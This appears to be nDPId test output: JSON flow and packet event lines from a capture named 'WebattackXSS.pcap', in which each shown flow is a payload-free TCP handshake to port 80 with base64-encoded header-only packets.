-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1499347816657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816657,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lQ1AAD4GMMOsEAABwKgKMoDqAFAyzLAMAAAAAKACchDUswAAAgQFtAQCCAoBPCUBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":2,"flow_last_seen":1499347816658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347816658,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgOp6zxHVMsywDaAScSBOkwAAAgQFtAQCCAoD5fZ1ATwlAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":3,"flow_last_seen":1499347816658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347816658,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lQ5AAD4GMMqsEAABwKgKMoDqAFAyzLANes8R1oAQAOXtmgAAAQEICgE8JQED5fZ1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347819250,"flow_last_seen":1499347819250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347819250,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1499347819250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LORAAD4GmOysEAABwKgKMoEEAFDtQwttAAAAAKACchC8OQAAAgQFtAQCCAoBPCeJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":2,"flow_last_seen":1499347819251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347819251,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgQQkyBmr7UMLbqAScSCBwQAAAgQFtAQCCAoD5fj+ATwniQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":3,"flow_last_seen":1499347819251,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347819251,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LOVAAD4GmPOsEAABwKgKMoEEAFDtQwtuJMgZrIAQAOUgyQAAAQEICgE8J4kD5fj+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347820510,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347820510,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7106,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zKZAAD4G+SmsEAABwKgKMoESAFBNgeRiAAAAAKACchCBvQAAAgQFtAQCCAoBPCjEAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":2,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347820510,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgRIUqvVqTYHkY6AScSB6aAAAAgQFtAQCCAoD5fo5ATwoxAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":3,"flow_last_seen":1499347820510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347820510,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zKdAAD4G+TCsEAABwKgKMoESAFBNgeRjFKr1a4AQAOUZcAAAAQEICgE8KMQD5fo5"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347823117,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vRAAD4GxtusEAABwKgKMoEsAFBFq9WkAAAAAKACchCVqwAAAgQFtAQCCAoBPCtQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7128,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":2,"flow_last_seen":1499347823117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347823117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgSyhFRrnRavVpaAScSDZ4wAAAgQFtAQCCAoD5fzEATwrUAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7130,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":3,"flow_last_seen":1499347823118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347823118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vVAAD4GxuKsEAABwKgKMoEsAFBFq9WloRUa6IAQAOV46wAAAQEICgE8K1AD5fzE"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347697189,"flow_last_seen":1499347702808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347698449,"flow_last_seen":1499347703808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347699724,"flow_last_seen":1499347704808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347702287,"flow_last_seen":1499347707810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":435,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347703726,"flow_last_seen":1499347708810,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347823121,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60028,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347824426,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347824426,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80mVAAD4G82qsEAABwKgKMoE6AFCPwv7yAAAAAKACchAg8QAAAgQFtAQCCAoBPCyXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":2,"flow_last_seen":1499347824426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347824426,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgToZT9eBj8L+86AScSAvDQAAAgQFtAQCCAoD5f4MATwslwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":3,"flow_last_seen":1499347824427,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347824427,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00mZAAD4G83GsEAABwKgKMoE6AFCPwv7zGU\/XgoAQAOXOFAAAAQEICgE8LJcD5f4M"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347825732,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347825732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Tq1AAD4GdyOsEAABwKgKMoFIAFDgbWNwAAAAAKACchBqdAAAAgQFtAQCCAoBPC3dAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":2,"flow_last_seen":1499347825732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347825732,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgUjyJE\/d4G1jcaAScSAmGQAAAgQFtAQCCAoD5f9SATwt3QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":3,"flow_last_seen":1499347825733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347825733,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Tq5AAD4GdyqsEAABwKgKMoFIAFDgbWNx8iRP3oAQAOXFHwAAAQEICgE8Ld4D5f9S"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347828369,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347828369,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7166,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QFxAAD4GhXSsEAABwKgKMoFiAFAwDnAtAAAAAKACchALaQAAAgQFtAQCCAoBPDBxAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7167,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":2,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347828369,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgWKuqhlpMA5wLqAScSA+aQAAAgQFtAQCCAoD5gHlATwwcQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7168,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":3,"flow_last_seen":1499347828369,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347828369,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QF1AAD4GhXusEAABwKgKMoFiAFAwDnAurqoZaoAQAOXdcAAAAQEICgE8MHED5gHl"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347829667,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347829667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lVZAAD4GMHqsEAABwKgKMoFwAFBnlqTjAAAAAKACchCd2AAAAgQFtAQCCAoBPDG1AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":2,"flow_last_seen":1499347829667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347829667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgXAvgGqdZ5ak5KAScSD9iQAAAgQFtAQCCAoD5gMqATwxtQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":3,"flow_last_seen":1499347829668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347829668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lVdAAD4GMIGsEAABwKgKMoFwAFBnlqTkL4BqnoAQAOWckAAAAQEICgE8MbYD5gMq"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347832201,"flow_last_seen":1499347832201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347832201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7200,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1499347832201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Dq9AAD4GtyGsEAABwKgKMoGKAFARZDqAAAAAAKACchBb2gAAAgQFtAQCCAoBPDQvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7201,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":2,"flow_last_seen":1499347832202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347832202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgYqpulj1EWQ6gaAScSBQgAAAAgQFtAQCCAoD5gWjATw0LwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":3,"flow_last_seen":1499347832202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347832202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DrBAAD4GtyisEAABwKgKMoGKAFARZDqBqbpY9oAQAOXvhwAAAQEICgE8NC8D5gWj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347833462,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H+JAAD4Gpe6sEAABwKgKMoGYAFAzOSqIAAAAAKACchBItAAAAgQFtAQCCAoBPDVqAAAAAAEDAwc="} 